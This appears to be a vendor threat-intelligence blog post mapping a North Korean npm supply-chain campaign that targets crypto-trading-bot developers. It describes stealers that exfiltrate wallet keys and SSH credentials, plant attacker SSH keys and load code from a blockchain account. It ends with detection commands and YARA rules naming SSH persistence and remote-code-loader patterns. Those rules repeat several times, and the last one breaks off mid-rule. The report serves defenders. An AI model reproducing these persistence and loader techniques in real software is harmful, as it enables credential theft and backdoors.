PODCAST

How AI is changing the SOC operating model. Listen now →

Platform

Solutions

Resources

Company

Book a demo

Platform

Solutions

Resources

Company

Book a demo

How AI is changing the SOC operating model. Listen now →

See all blogs

BLOG

Mapping The Contagious Trader Delivery Network

Alessandra

Rizzo

May 14, 2026

Executive Summary

North Korean threat actors are targeting cryptocurrency developers through a large-scale software supply chain campaign that combines malicious npm packages, GitHub repositories, and social media promotion.

Panther's npm threat scanner identified over 50 malicious packages embedded across more than 100 GitHub repositories targeting developers in the Polymarket, PancakeSwap, PumpFun/Solana, Hyperliquid, Kalshi, and general Ethereum Virtual Machine (EVM) ecosystems.

The packages are operated by 30+ throwaway npm personas and rotate across 20+ command-and-control domains at time of writing.

The packages fall into three distinct DPRK malware families:

PromptMink, an LLM-generated infostealer named by ReversingLabs, exfiltrates wallet keys, environment secrets, and SSH credentials. ClipViper, which we have named for this report, is a persistent Windows clipboard stealer deployed through a multi-layer dependency chain. OtterCookie, documented in our separate report, is a credential exfiltration and SSH backdoor toolchain.

The malicious repositories are promoted through verified accounts on X and Reddit, use spoofed developer identities and bot-inflated star counts to appear legitimate, and are distributed across 40+ GitHub users and organizations as redundant delivery fronts.

Automated package scanners miss the attack because the malicious payload sits one to three dependency hops deep; the visible code passes review while the malware lives in a sub-dependency.

We attribute the activity with high confidence to DPRK / Famous Chollima as part of the Contagious Trader campaign, with IoCs corroborated by findings from KMSec, ReversingLabs, OTX, and independent researchers including @stephenlacy and @MalwareUtkonos. Contagious Trader is the name assigned to the cluster of npm-poisoning activity targeting crypto trading bot developers.

Attack Chain

The attack chain depicted above follows a consistent pattern: malicious npm packages are embedded as dependencies in crypto trading bot GitHub repositories, promoted through social media and SEO-optimized READMEs. When a user clones the repo and runs npm install, the typosquatted dependency silently executes the payload.

The operators maintain parallel GitHub orgs as redundant delivery fronts. When one gets taken down, the others continue serving the same payload.

The campaign uses two distinct techniques to make malicious repositories look authored by trusted developers: outright identity theft of real contributors and per-commit attribution spoofing via $(git config user.name) shell injection.

Campaign Timeline

The campaign began on February 19, 2026, when PromptMink's first two packages (npm-eslint-helper and bn-eslint.js) were published within 90 seconds of each other. OtterCookie followed the next day with npm-doc-builder.

Activity escalated sharply in April, with 23 new packages published, more than double March's output. The most intense burst came between April 21 and 23, when 10 packages across all three clusters appeared in roughly 30 hours, including the first ClipViper payload.

As of May 11, the campaign shows no signs of slowing. Nine new packages have appeared in the first eight days of the month, a pace that would exceed April's rate. Packages like pino-pretty-logger, api-ts-utils, and npm-doc-dev are still receiving fresh versions, indicating the operators are actively maintaining deployed infrastructure and victim acquisition is ongoing.

Contagious Interview and Contagious Trader: Converging Toolsets

The three malware families in this report trace back to nominally separate DPRK campaigns that increasingly share infrastructure. OtterCookie was originally a Contagious Interview payload, deployed through fake job lures.

ReversingLabs documented PromptMink as a distinct campaign by Famous Chollima, noting that its packages overlap significantly with Contagious Trader.

Our findings confirm that overlap: PromptMink is the dominant family in the Trader delivery network, embedded across 45+ GitHub repos through packages like bn-eslint.js, chalks-logger, prettier-logger, and a dozen other typosquats. OtterCookie appears in Trader repos via packages from a.yal.a.da.ve7, al.lanjaysa.t.i.a.gi, and alberto1114.

Multiple teams have observed this convergence independently. GitLab Threat Intelligence assessed that DPRK malware activity involves distinct teams operating in parallel, based on branching distribution techniques, infrastructure, and malware variants. BlueVoyant described a two-pronged model: targeted fake job offers on one side, broad npm poisoning through crypto bot repos on the other.

The Bait

Malicious repositories don't find victims on their own. The campaign relies on social media promotion to drive developers toward the poisoned repos, making the promotion layer as critical to the kill chain as the malware itself.

We confirmed two X accounts actively promoting malicious GitHub repositories linked to the Contagious Trader campaign. Many more promotional posts likely exist, but tracking is difficult because a significant number of the repos they reference have already been taken down.

Figure 1: Screenshot of X post promoting malicious DPRK-attributed GitHub repository

The promoting profiles appear "verified" with large follower counts, likely inflated by bots. Whether these are DPRK-operated, paid promoters, or unwitting amplifiers, the effect is the same.

Figure 2: Screenshot of verified X profile responsible for the post in Figure 1

In one case, the verified account @RepoGems promoted a repo from Krypto-Hashers-Community, a confirmed PromptMink delivery org that imported bn-eslint.js.

The GitHub org has been taken down, but the promotional tweet remains live. The social media layer persists independently of the GitHub infrastructure it promotes.

We have identified one Reddit instance suggesting the same playbook extends beyond X. In the r/PredictionsMarkets subreddit, a post covering strategies to earn $100K a month received several comments from user Miserable_Variety277 that directly link to a malicious repository.

Figure 3: Screenshot of the r/PredictionsMarket subreddit comments promoting a malicious DPRK-attributed GitHub repository

The repository linked in those comments, which now redirects to polymarket-btc-5min-15min-arbitrage-trading-bot, is still live with its most recent commit published on May 8, 2026, and imports emojiprint-logger - a PromptMink package that appears in KMSec feed as recently as May 3rd.

We can't confidently assess whether these are unwitting amplifiers or DPRK personas.

The GitHub delivery network

The network spans over 100 repositories distributing malware through NPM dependency poisoning. These repos follow the pattern documented by KMSec in the Contagious Trader campaign, targeting Polymarket, PumpFun, Solana, Hyperliquid, and others.

DPRK Developer Personas

One of the most interesting accounts we have tracked in this campaign is lorine93s, which appears on GitHub and NPM. Although the NPM email does not match the GitHub email we found on their profile, the username is the same.

The account is extremely well-polished with a professional developer persona, with links to a personal portfolio hosted on Vercel.

Whether any of this is authentic cannot be verified; the GitHub account may simply be compromised.

The account is responsible for several malicious repositories importing DPRK-attributed packages. As of May 11, 2026, the repositories hosted on this account are updated every few days.

Figure 4: Screenshot of the lorine93s GitHub account

Developer Identity Spoofing and Theft

A sample of repositories revealed that malicious commits are attributed to legitimate open-source developers via $(git config user.name) shell injection. One malicious commit spoofing a known Swedish open-source contributor carries a +0900 timezone offset (UTC+9, consistent with the Korean peninsula). We cross-referenced the claimed developer with their public GitHub activity and found no history of commits to any of the malicious repositories.

In one of the repositories we analyzed, screenshotted below, the commit author field reads $(git config user.name), a failed shell injection that exposes the spoofing technique.

The second technique is outright identity theft. The gigi0500 GitHub account (six PumpFun-themed delivery repos) operates under a stolen developer's name, location, and profile photo with 119 repositories and 283 followers.

Malicious Imports

The malicious payloads are imported in one of two ways: through a direct dependency listing in package.json and/or through a direct import in /src/index.ts.

Figure 5: Malicious NPM import via dependency listing in package.json

Figure 6: Malicious NPM import via createRequire

Repository descriptions are packed with crypto-related keywords to game SEO.

Figure 7: GitHub repository description pattern of SEO stuffed keywords

The repositories serve as delivery fronts for PromptMink, ClipViper, and OtterCookie.

In one case, a single repo imported both bn-eslint.js (PromptMink) and web-http-errors (ClipViper), hitting the developer with both payloads simultaneously.

That repo, tied to CashBlazorLab, was the one promoted in the X post above by @Atenov_D. Most others import one of the three families. Several are forks of each other — the ClipViper section below covers a 40+ fork chain.

The count is not exhaustive. Given the scale of the operation within a single crypto ecosystem, there are likely other targeted ecosystems we have not yet mapped. In one instance, a repository claimed to use OpenClaw as a Polymarket trading bot through this same delivery network.

Figure 8: DPRK-attributed GitHub Repository leveraging OpenClaw keywords

PromptMink Cluster

The repositories in this cluster deliver the credential stealer malware PromptMink, recently documented by ReversingLabs, who tracked its evolution from obfuscated JS to SEA binaries to compiled Rust payloads over seven months. It was built from scratch using LLM-generated code and is distinct from OtterCookie, BeaverTail, and InvisibleFerret.

In our samples, the payload exports a from_str() function that recursively scans the working directory for .env, config.toml, and id.json files, then uploads them to C2 servers via /api/validate/* endpoints.

Most also inject an attacker SSH key into ~/.ssh/authorized_keys and open port 22 via sudo ufw allow 22/tcp for persistent remote access.

The same from_str() exfiltration pattern appears in npm-eslint-helper, which is the payload behind the bn-eslint.js typosquat distributed across the GitHub delivery network, connecting the delivery repos directly to this cluster.

PromptMink Actor Network

We map the NPM actor network distributing the PromptMink malware family below.

Actor	Packages	Notes
lorine93s	picocolor-logger, pinky-logger, chalks-logger, chalk-pro-logger, emojiprint-logger, chalki-pretty	Continuation of sleek-pretty. Two SSH keys rotated across versions. C2 domains A/B tested simultaneously. chalki-pretty links to OTX-confirmed DPRK infrastructure.
npmpodev0707	styled-text-logger	OTX-confirmed DPRK C2. Exfiltrates file contents in batches of 50. RSA key po@DESKTOP-EDKDDLL links to devking1616.
devking1616	color-logger-console	KMSec-confirmed C2. First socket.io transport in this campaign. podev email prefix mirrors npmpodev0707.
amauri_jesus	bn-eslint.js, npm-eslint-helper	Same from_str() exfil technique. bn.js typosquat distributed across 20+ GitHub repos. cashblaze1001 email links to CashBlazorLab.
rafinhossian	big256-ts, npm-doc-dev	Two-layer chain: big256-ts (big.js typosquat) loads npm-doc-dev. 7+ versions, 82 downloads/wk.
y.rix.elfi.e.co	ts-relayer-pub	New actor, new C2 domain. Same from_str() + file targets + UDP IP probe.
cryptopawsol	logger-beauty	KMSec watchlist. 302 downloads/wk.
soju_dev	pino-pretty-logger	Same SSH + file exfil + /api/validate/ pattern.
aleksislabs	prettier-logger, polymarket-onchain-sdk	SSH backdoor + infostealer. Outlook email (unusual for this campaign). polymarket-onchain-sdk is a direct Polymarket SDK typosquat.
maklionelox	polymarket-onchain-plugin	Polymarket SDK typosquat. Same from_str() pattern.
moduler	ts-moduler	Delivered via tradebothub/polymarket-trading-bot.
ffffrakyevin	api-node-utils, api-ts-utils (v3.x), typescript-util-core	Cluster migration from ClipViper (see ClipViper table). Same `from_str()` exfil pattern wrapped in deceptive export names (`check_if_matches`, `search_hashes`, `verify_hash`) to blend with finance-themed host packages. UDP probe to `8.8.8.8` for IP discovery. C2: `polymarkettrading[.]vercel[.]app/api/v1`.

ClipViper Cluster

We are introducing the name ClipViper for this cluster. To our knowledge, no public reporting has previously assigned it a family name. It distributes a Windows clipboard stealer we had not seen in DPRK's toolset, delivered through 40+ repositories as of publication.

The malicious behavior was first identified by @MalwareUtkonos on X on May 2nd, in a comment under the fraudulent X post promoting the GitHub repo that imports the malicious npm package.

The ffffrakyevin actor bridges both clusters. Early versions of api-ts-utils (v1.0.0-2.1.4) delivered ClipViper, while later versions (v3.x) switched to PromptMink. Identical build artifacts (the prettier-lint/ directory and cdll-run-hidden.vbs dev paths) confirm this is the same operator as kunwarshivam1971.

Figure 9: MalwareUtkonos on X posting evidence of the malicious behavior found on the CashBlazorLab repository, advertised in Figure 1

On execution, the stealer:

Sends an install beacon ({"text": "installed"}) to nonce-link[.]vercel[.]app/api/nonce for real-time victim counting
Copies itself to %LOCALAPPDATA%\\prettier-lint\\cdll.mjs and launches as a detached child process
Creates cdll-run-hidden.vbs to suppress the console window
Registers a scheduled task named CdllProtect (mimicking a system protection service) for persistence
Creates .cdll-clipboard-worker.lock in the user profile to prevent duplicate instances
Continuously monitors the clipboard and exfiltrates contents to the C2

The ClipViper delivery network operates under the Chain-Ether-Core, Infranova-Labs, and Cryptonerva GitHub organizations, forking CashBlazorLab's repo into 40+ copies with auto-generated names (system-lab-5857, data-pipeline-system-4275, sync-batch-lab-5312), each with ~1k bot-inflated stars and SEO-spammed descriptions.

The main delivery technique is listing web-http-errors as a direct dependency in package.json, making them ClipViper-only delivery fronts. web-http-errors hides its malicious behavior in a transitive dependency, prettier-resolver. The clipboard stealer payloads live in prettier-lint/.

Figure 10: Screenshot of the ClipViper directory and payloads from the live NPM registry.

ClipViper Actor Network

Actor	Packages	Notes
ffffrakyevin	api-ts-utils (v1.0.0–2.1.4)	Confirmed same operator as kunwarshivam1971 via identical build artifacts (`prettier-lint/` directory, `cdll-run-hidden.vbs` dev paths). `nonce-link` C2 bridges to kunwarshivam1971 and danlo00holoden. Migrated to PromptMink at v3.x and added two new packages, see PromptMink table.
kunwarshivam1971	prettier-resolver, web-http-errors, http-errors-cli	Clipboard stealer payload. First to publish at 07:24 UTC April 21. Six malicious versions in 44 minutes.
danlo00holoden	classnames-sub-folk, result-type-tool	cashblaze0510 email mirrors CashBlazorLab GitHub org name. Six cover packages in 4-minute burst. result-type-tool chains through classnames-sub-folk as a transitive ClipViper delivery layer.

OtterCookie Cluster

A third cluster of GitHub repositories distributes the OtterCookie variant we documented in this report. The delivery pattern is the same: one npm account publishes a benign clone of a popular package (often Big.js), which imports a malicious dependency from the same author. The key difference is depth. From the GitHub repo's package.json, the malicious payload sits three dependency hops deep.

OtterCookie Actor Network

Note we are only indicating new actors in the table below. For a full list of IoCs of the OtterCookie campaign in this cluster, read our previous report.

Actor	Packages	Notes
a.yal.a.da.ve7	bigint.os, lint-null	Dotted-name actor. Two pairs of two-layer big.js typosquat chains. Same obfuscation framework as OtterCookie samples.
n.ar.a.tat.ia.n.aaa	mjs-biginteger, ts-lint-builders	Dotted-name actor. big-integer typosquat paired with payload. Shared payload hash bcfb01ee... with st-bigintr and cjs-biginteger.
al.lanjaysa.t.i.a.gi	npm-doc-builder	Dotted-name actor. C2 confirmed as OtterCookie infrastructure. Also documented in OtterCookie report.
a.n.n.as.ibal2.36	st-bigintr, sjs-builder	Dotted-name actor. Payload hash bcfb01ee... shared with mjs-biginteger and cjs-biginteger. Solana devnet API abused as C2.
ca.r.lane.es1.2.6	cjs-biginteger, ts-lint-builds	Dotted-name actor. Same payload hash bcfb01ee... as st-bigintr and mjs-biginteger. ts-lint-builds confirmed malicious in scanner data.
ayal.a.d.av.e.7	sjs-builders, st-biginteger	Dotted-name actor. Near-identical username to `a.yal.a.da.ve7`. Previously misattributed. Separate npm account with distinct package set.
alberto1114	lint-builder-logger, ts-big-lib, levex-press	Known actor from 108-packages report. lint-builder-logger is an unobfuscated OtterCookie Rosetta Stone (from_str_1/from_str_2 dual chain). levex-press pivots to bare-IP C2. Reuses documented OtterCookie infrastructure.
digoschristiann	npm-builders, ts-lint-builder	Dotted-name email pattern (googlemail[.]com). Unobfuscated OtterCookie payload. Shared C2 with alberto1114 and `al.lanjaysa.t.i.a.gi`. ts-lint-builder confirmed malicious in scanner data, 204 weekly downloads.
a.l.l.a.nh.orca0.7	bjs-lint-builders	New actor not in prior reporting. Dotted Gmail rotation pattern. Package contacted cloudflareinsights[.]vercel[.]app — confirmed OtterCookie C2 shared with npm-doc-builder and npm-builders.
jofarc	awesome-cli-builders, awesome-cli-logger, rjs-biginteger	Two-layer chain: rjs-biginteger (big-integer typosquat) loads awesome-cli-builders. awesome-cli-logger confirmed malicious in scanner data.

Shifting Techniques, a Cat and Mouse Game

As npm scanners improve, the operators adapt.

On May 7, the a.n.n.as.ibal2.36 actor stripped both st-bigintr and sjs-builder down to identical 26-line loaders. The previous versions were full OtterCookie payloads, with 52 kB of obfuscated JavaScript disguised as big.js clones, complete with README and LICENSE files. The new versions contain nothing but a fetch call to the Solana devnet API, which retrieves executable code stored in a blockchain account (4WF8QCFEnVD7BLs3QAVe2SjxRZ4n3EboCsdhj363VAqZ), decodes it from base64, and runs it via new Function().

The npm package now contains no malicious code at all. The payload lives on-chain, where it can be updated without publishing a new package version, and where most static scanners cannot follow.

Figure 11: Solana-based loader

Takeaways & Recommendations

The boundaries between these campaigns are dissolving. IoCs from both Contagious Trader and Contagious Interview should be treated as a single threat.

The malware comes from a small set of operators. The delivery vectors don't. We've seen GitHub orgs get taken down while the same packages keep landing in new repos within hours.

If you cloned a crypto trading bot from GitHub in the past six months, check it against the IoCs in this report. If you ran npm install on a repo you found through social media, assume compromise until proven otherwise.

The full package list, repository table, C2 infrastructure, SSH keys, and detection queries are provided to support immediate triage.

Detection

Linux and Mac

Save the keys from the SSH Keys section to keys.txt, then:

grep -Ff keys.txt ~/.ssh/authorized_keys /root/.ssh/authorized_keys /home/*/.ssh/authorized_keys 2

grep -Ff keys.txt ~/.ssh/authorized_keys /root/.ssh/authorized_keys /home/*/.ssh/authorized_keys 2

grep -Ff keys.txt ~/.ssh/authorized_keys /root/.ssh/authorized_keys /home/*/.ssh/authorized_keys 2

grep -Ff keys.txt ~/.ssh/authorized_keys /root/.ssh/authorized_keys /home/*/.ssh/authorized_keys 2

Check for the ufw allow 22/tcp artifact on hosts that don't run SSH:

sudo ufw status | grep "22/tcp"

sudo ufw status | grep "22/tcp"

sudo ufw status | grep "22/tcp"

sudo ufw status | grep "22/tcp"

Hunt for the from_str() exfil pattern, including the deceptive aliases used by ffffrakyevin:

grep -rE "function (from_str(_[12])?|check_if_matches|search_hashes|verify_hash)\\s*\\(" node_modules/ 2

grep -rE "function (from_str(_[12])?|check_if_matches|search_hashes|verify_hash)\\s*\\(" node_modules/ 2

grep -rE "function (from_str(_[12])?|check_if_matches|search_hashes|verify_hash)\\s*\\(" node_modules/ 2

grep -rE "function (from_str(_[12])?|check_if_matches|search_hashes|verify_hash)\\s*\\(" node_modules/ 2

Windows

schtasks /query /tn "CdllProtect" 2>$null
Get-ChildItem "$env:LOCALAPPDATA\\prettier-lint\\" 2>$null
Get-ChildItem "$env:USERPROFILE\\.cdll-clipboard-worker.lock" 2>$null

schtasks /query /tn "CdllProtect" 2>$null
Get-ChildItem "$env:LOCALAPPDATA\\prettier-lint\\" 2>$null
Get-ChildItem "$env:USERPROFILE\\.cdll-clipboard-worker.lock" 2>$null

schtasks /query /tn "CdllProtect" 2>$null
Get-ChildItem "$env:LOCALAPPDATA\\prettier-lint\\" 2>$null
Get-ChildItem "$env:USERPROFILE\\.cdll-clipboard-worker.lock" 2>$null

schtasks /query /tn "CdllProtect" 2>$null
Get-ChildItem "$env:LOCALAPPDATA\\prettier-lint\\" 2>$null
Get-ChildItem "$env:USERPROFILE\\.cdll-clipboard-worker.lock" 2>$null

Pre-install

Block every package in the IoC table at your SCA tool or private registry mirror.
Audit lockfiles for transitive hits. ClipViper's web-http-errors pulls prettier-resolver; OtterCookie chains nest three deep.
In cloned repos, flag commits with +0900 timezone offsets or a literal $(git config user.name) in the author field.

Network

Block every entry in the C2 table at the DNS or proxy layer. From node or npm processes, flag any of the following:

UDP to 8.8.8[.]8:53 with zero bytes sent (PromptMink IP discovery primitive)

HTTP to api.ipify[.]org, checkip.amazonaws[.]com, icanhazip[.]com, or ifconfig[.]me
POST to /api/validate/* or /api/v1 on a .vercel.app host (PromptMink exfil)
POST to /api/nonce with body {"text": "installed"} (ClipViper install beacon)
HTTPS to api.devnet.solana[.]com during npm install (OtterCookie on-chain loader)
GET to /api/ssh-key, /api/scan-patterns, or /api/block-patterns from a node process (OtterCookie config fetch)
POST to /api/v1 on a bare IP from a node process (OtterCookie file exfil)

YARA Rules

rule suspicious_ssh_persistence {
    meta:
        description = "Source attempts to inject an SSH key into authorized_keys, open the SSH port at the firewall, or take ownership of ~/.ssh — persistence and lateral-movement setup"
        author = "PantherLabs"
    strings:
        // authorized_keys as a write target. Paired with a write primitive
        // in the condition
        $authorized_keys = "authorized_keys" ascii nocase

        // Write primitives that could append a key
        $fs_write       = "writeFileSync" ascii
        $fs_append      = "appendFileSync" ascii
        $fs_write_async = /fs\\.write\\s*\\(/ ascii
        $fs_open_append = /\\{[^}]{0,60}flag\\s*:\\s*['"][aw]\\+?['"][^}]{0,60}\\}/ ascii

        // Public key format literals — "ssh-rsa AAAA" and "ssh-ed25519 AAAA"
        // are fixed header+base64-prefix so they're cheap to match and
        // almost never appear in legitimate code outside of SSH-mgmt tools.
        $pubkey_rsa     = "ssh-rsa AAAA" ascii
        $pubkey_ed25519 = "ssh-ed25519 AAAA" ascii
        $pubkey_ecdsa   = "ecdsa-sha2-nistp256 AAAA" ascii

        // Firewall rules opening the SSH port
        $ufw_ssh          = /ufw\\s+allow\\s+(ssh|22\\b)/ ascii nocase
        $firewalld_ssh    = /firewall-cmd\\s+--add-(service=ssh|port=22)/ ascii
        $iptables_ssh     = /iptables[^"\\n]{1,80}--dport\\s+22\\b/ ascii
        $windows_fw_ssh   = /netsh\\s+advfirewall[^"\\n]{1,80}port=22\\b/ ascii nocase

        // ~/.ssh ownership manipulation — chown/chmod near .ssh
        $chown_ssh = /chown[^"\\n]{1,40}\\.ssh/ ascii
        $chmod_ssh = /chmod\\s+[67]00[^"\\n]{1,40}\\.ssh/ ascii

        // sshd_config tampering
        $sshd_config = "sshd_config" ascii

    condition:
        filesize < 1MB and (
            // A public-key literal alone is essentially never legitimate
            any of ($pubkey_*)
            or
            // Writing to authorized_keys with a fs write primitive
            ($authorized_keys and any of ($fs_write, $fs_append, $fs_write_async, $fs_open_append))
            or
            // Opening the SSH port at the firewall
            any of ($ufw_ssh, $firewalld_ssh, $iptables_ssh, $windows_fw_ssh)
            or
            // chown/chmod applied specifically to the .ssh directory
            any of ($chown_ssh, $chmod_ssh)
            or
            // sshd_config edit paired with a write primitive
            ($sshd_config and any of ($fs_write, $fs_append, $fs_write_async))
        )
}

rule suspicious_ssh_persistence {
    meta:
        description = "Source attempts to inject an SSH key into authorized_keys, open the SSH port at the firewall, or take ownership of ~/.ssh — persistence and lateral-movement setup"
        author = "PantherLabs"
    strings:
        // authorized_keys as a write target. Paired with a write primitive
        // in the condition
        $authorized_keys = "authorized_keys" ascii nocase

        // Write primitives that could append a key
        $fs_write       = "writeFileSync" ascii
        $fs_append      = "appendFileSync" ascii
        $fs_write_async = /fs\\.write\\s*\\(/ ascii
        $fs_open_append = /\\{[^}]{0,60}flag\\s*:\\s*['"][aw]\\+?['"][^}]{0,60}\\}/ ascii

        // Public key format literals — "ssh-rsa AAAA" and "ssh-ed25519 AAAA"
        // are fixed header+base64-prefix so they're cheap to match and
        // almost never appear in legitimate code outside of SSH-mgmt tools.
        $pubkey_rsa     = "ssh-rsa AAAA" ascii
        $pubkey_ed25519 = "ssh-ed25519 AAAA" ascii
        $pubkey_ecdsa   = "ecdsa-sha2-nistp256 AAAA" ascii

        // Firewall rules opening the SSH port
        $ufw_ssh          = /ufw\\s+allow\\s+(ssh|22\\b)/ ascii nocase
        $firewalld_ssh    = /firewall-cmd\\s+--add-(service=ssh|port=22)/ ascii
        $iptables_ssh     = /iptables[^"\\n]{1,80}--dport\\s+22\\b/ ascii
        $windows_fw_ssh   = /netsh\\s+advfirewall[^"\\n]{1,80}port=22\\b/ ascii nocase

        // ~/.ssh ownership manipulation — chown/chmod near .ssh
        $chown_ssh = /chown[^"\\n]{1,40}\\.ssh/ ascii
        $chmod_ssh = /chmod\\s+[67]00[^"\\n]{1,40}\\.ssh/ ascii

        // sshd_config tampering
        $sshd_config = "sshd_config" ascii

    condition:
        filesize < 1MB and (
            // A public-key literal alone is essentially never legitimate
            any of ($pubkey_*)
            or
            // Writing to authorized_keys with a fs write primitive
            ($authorized_keys and any of ($fs_write, $fs_append, $fs_write_async, $fs_open_append))
            or
            // Opening the SSH port at the firewall
            any of ($ufw_ssh, $firewalld_ssh, $iptables_ssh, $windows_fw_ssh)
            or
            // chown/chmod applied specifically to the .ssh directory
            any of ($chown_ssh, $chmod_ssh)
            or
            // sshd_config edit paired with a write primitive
            ($sshd_config and any of ($fs_write, $fs_append, $fs_write_async))
        )
}

rule suspicious_ssh_persistence {
    meta:
        description = "Source attempts to inject an SSH key into authorized_keys, open the SSH port at the firewall, or take ownership of ~/.ssh — persistence and lateral-movement setup"
        author = "PantherLabs"
    strings:
        // authorized_keys as a write target. Paired with a write primitive
        // in the condition
        $authorized_keys = "authorized_keys" ascii nocase

        // Write primitives that could append a key
        $fs_write       = "writeFileSync" ascii
        $fs_append      = "appendFileSync" ascii
        $fs_write_async = /fs\\.write\\s*\\(/ ascii
        $fs_open_append = /\\{[^}]{0,60}flag\\s*:\\s*['"][aw]\\+?['"][^}]{0,60}\\}/ ascii

        // Public key format literals — "ssh-rsa AAAA" and "ssh-ed25519 AAAA"
        // are fixed header+base64-prefix so they're cheap to match and
        // almost never appear in legitimate code outside of SSH-mgmt tools.
        $pubkey_rsa     = "ssh-rsa AAAA" ascii
        $pubkey_ed25519 = "ssh-ed25519 AAAA" ascii
        $pubkey_ecdsa   = "ecdsa-sha2-nistp256 AAAA" ascii

        // Firewall rules opening the SSH port
        $ufw_ssh          = /ufw\\s+allow\\s+(ssh|22\\b)/ ascii nocase
        $firewalld_ssh    = /firewall-cmd\\s+--add-(service=ssh|port=22)/ ascii
        $iptables_ssh     = /iptables[^"\\n]{1,80}--dport\\s+22\\b/ ascii
        $windows_fw_ssh   = /netsh\\s+advfirewall[^"\\n]{1,80}port=22\\b/ ascii nocase

        // ~/.ssh ownership manipulation — chown/chmod near .ssh
        $chown_ssh = /chown[^"\\n]{1,40}\\.ssh/ ascii
        $chmod_ssh = /chmod\\s+[67]00[^"\\n]{1,40}\\.ssh/ ascii

        // sshd_config tampering
        $sshd_config = "sshd_config" ascii

    condition:
        filesize < 1MB and (
            // A public-key literal alone is essentially never legitimate
            any of ($pubkey_*)
            or
            // Writing to authorized_keys with a fs write primitive
            ($authorized_keys and any of ($fs_write, $fs_append, $fs_write_async, $fs_open_append))
            or
            // Opening the SSH port at the firewall
            any of ($ufw_ssh, $firewalld_ssh, $iptables_ssh, $windows_fw_ssh)
            or
            // chown/chmod applied specifically to the .ssh directory
            any of ($chown_ssh, $chmod_ssh)
            or
            // sshd_config edit paired with a write primitive
            ($sshd_config and any of ($fs_write, $fs_append, $fs_write_async))
        )
}

rule suspicious_ssh_persistence {
    meta:
        description = "Source attempts to inject an SSH key into authorized_keys, open the SSH port at the firewall, or take ownership of ~/.ssh — persistence and lateral-movement setup"
        author = "PantherLabs"
    strings:
        // authorized_keys as a write target. Paired with a write primitive
        // in the condition
        $authorized_keys = "authorized_keys" ascii nocase

        // Write primitives that could append a key
        $fs_write       = "writeFileSync" ascii
        $fs_append      = "appendFileSync" ascii
        $fs_write_async = /fs\\.write\\s*\\(/ ascii
        $fs_open_append = /\\{[^}]{0,60}flag\\s*:\\s*['"][aw]\\+?['"][^}]{0,60}\\}/ ascii

        // Public key format literals — "ssh-rsa AAAA" and "ssh-ed25519 AAAA"
        // are fixed header+base64-prefix so they're cheap to match and
        // almost never appear in legitimate code outside of SSH-mgmt tools.
        $pubkey_rsa     = "ssh-rsa AAAA" ascii
        $pubkey_ed25519 = "ssh-ed25519 AAAA" ascii
        $pubkey_ecdsa   = "ecdsa-sha2-nistp256 AAAA" ascii

        // Firewall rules opening the SSH port
        $ufw_ssh          = /ufw\\s+allow\\s+(ssh|22\\b)/ ascii nocase
        $firewalld_ssh    = /firewall-cmd\\s+--add-(service=ssh|port=22)/ ascii
        $iptables_ssh     = /iptables[^"\\n]{1,80}--dport\\s+22\\b/ ascii
        $windows_fw_ssh   = /netsh\\s+advfirewall[^"\\n]{1,80}port=22\\b/ ascii nocase

        // ~/.ssh ownership manipulation — chown/chmod near .ssh
        $chown_ssh = /chown[^"\\n]{1,40}\\.ssh/ ascii
        $chmod_ssh = /chmod\\s+[67]00[^"\\n]{1,40}\\.ssh/ ascii

        // sshd_config tampering
        $sshd_config = "sshd_config" ascii

    condition:
        filesize < 1MB and (
            // A public-key literal alone is essentially never legitimate
            any of ($pubkey_*)
            or
            // Writing to authorized_keys with a fs write primitive
            ($authorized_keys and any of ($fs_write, $fs_append, $fs_write_async, $fs_open_append))
            or
            // Opening the SSH port at the firewall
            any of ($ufw_ssh, $firewalld_ssh, $iptables_ssh, $windows_fw_ssh)
            or
            // chown/chmod applied specifically to the .ssh directory
            any of ($chown_ssh, $chmod_ssh)
            or
            // sshd_config edit paired with a write primitive
            ($sshd_config and any of ($fs_write, $fs_append, $fs_write_async))
        )
}

rule NPM_Remote_Code_Loader_HTTP_To_Function
{
    meta:
        description = "HTTP response body passed to Function constructor or eval — remote code loader pattern"
        author = "PantherLabs"
        date = "2026-04-16"
        severity = "high"
        campaign = "DPRK / Contagious Trader / OtterCookie"

    strings:
        // HTTP-fetch idioms — any one of these
        $http_axios_get   = /await\\s+axios\\s*\\.\\s*(get|post|put|patch|request)\\s*\\(/
        $http_axios_call  = /await\\s+axios\\s*\\(/
        $http_fetch       = /await\\s+fetch\\s*\\(/
        $http_got         = /await\\s+got\\s*(\\.\\s*\\w+\\s*)?\\(/
        $http_node        = /(https?|http2)\\s*\\.\\s*(get|request)\\s*\\(/

        // Dynamic-execution idioms — any one of these
        $dyn_function     = /new\\s+Function\\s*\\(/
        $dyn_fn_ctor      = /new\\s+Function\\s*\\.\\s*constructor\\s*\\(/
        $dyn_eval         = /\\beval\\s*\\(/
        $dyn_vmrun        = /\\bvm\\s*\\.\\s*runIn(This|New)Context\\s*\\(/
        $dyn_vmscript     = /new\\s+vm\\s*\\.\\s*Script\\s*\\(/

        // Reading a `data`/`body`/`config`/`payload` field off something
        // (the link between the HTTP response and the exec call)
        $field_extract    = /\\.\\s*data\\s*[\\.\\[]/
        $field_optchain   = /\\.\\s*data\\s*\\?\\s*\\./
        $field_body       = /\\.\\s*body\\s*[\\.\\[]/

    condition:
        filesize < 200KB
        and 1 of ($http_*)
        and 1 of ($dyn_*)
        and 1 of ($field_

rule NPM_Remote_Code_Loader_HTTP_To_Function
{
    meta:
        description = "HTTP response body passed to Function constructor or eval — remote code loader pattern"
        author = "PantherLabs"
        date = "2026-04-16"
        severity = "high"
        campaign = "DPRK / Contagious Trader / OtterCookie"

    strings:
        // HTTP-fetch idioms — any one of these
        $http_axios_get   = /await\\s+axios\\s*\\.\\s*(get|post|put|patch|request)\\s*\\(/
        $http_axios_call  = /await\\s+axios\\s*\\(/
        $http_fetch       = /await\\s+fetch\\s*\\(/
        $http_got         = /await\\s+got\\s*(\\.\\s*\\w+\\s*)?\\(/
        $http_node        = /(https?|http2)\\s*\\.\\s*(get|request)\\s*\\(/

        // Dynamic-execution idioms — any one of these
        $dyn_function     = /new\\s+Function\\s*\\(/
        $dyn_fn_ctor      = /new\\s+Function\\s*\\.\\s*constructor\\s*\\(/
        $dyn_eval         = /\\beval\\s*\\(/
        $dyn_vmrun        = /\\bvm\\s*\\.\\s*runIn(This|New)Context\\s*\\(/
        $dyn_vmscript     = /new\\s+vm\\s*\\.\\s*Script\\s*\\(/

        // Reading a `data`/`body`/`config`/`payload` field off something
        // (the link between the HTTP response and the exec call)
        $field_extract    = /\\.\\s*data\\s*[\\.\\[]/
        $field_optchain   = /\\.\\s*data\\s*\\?\\s*\\./
